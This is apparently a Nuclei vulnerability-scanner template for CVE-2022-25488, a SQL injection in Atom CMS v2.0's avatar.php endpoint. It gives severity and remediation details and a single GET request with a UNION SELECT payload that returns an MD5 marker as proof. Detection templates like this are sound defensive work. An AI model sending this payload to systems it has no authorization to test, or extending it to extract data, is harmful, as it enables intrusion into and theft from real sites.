nuclei-templates/http/cves/2022/CVE-2022-25488.yaml

51 lines
1.7 KiB
YAML

id: CVE-2022-25488
info:
name: Atom CMS v2.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: Fixed in version Atom CMS v2.1
reference:
- https://github.com/thedigicraft/Atom.CMS/issues/257
- https://nvd.nist.gov/vuln/detail/CVE-2022-25488
- https://github.com/ARPSyndicate/cvemon
- https://github.com/superlink996/chunqiuyunjingbachang
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-25488
cwe-id: CWE-89
epss-score: 0.0161
epss-percentile: 0.87161
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: thedigitalcraft
product: atomcms
tags: cve,cve2022,sqli,atom,cms,thedigitalcraft
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "/{{md5(num)}}"
- "avatar-container"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100a73c8ca0b49194b5bc99ad324b86286411cb6049ef9f136a9fe942a263d7510202205b6306efb5f7d90e7308cce0f917fa4153db6c0fefd0f487f526ed0ce2b1ab04:922c64590222798bb761d5b6d8e72950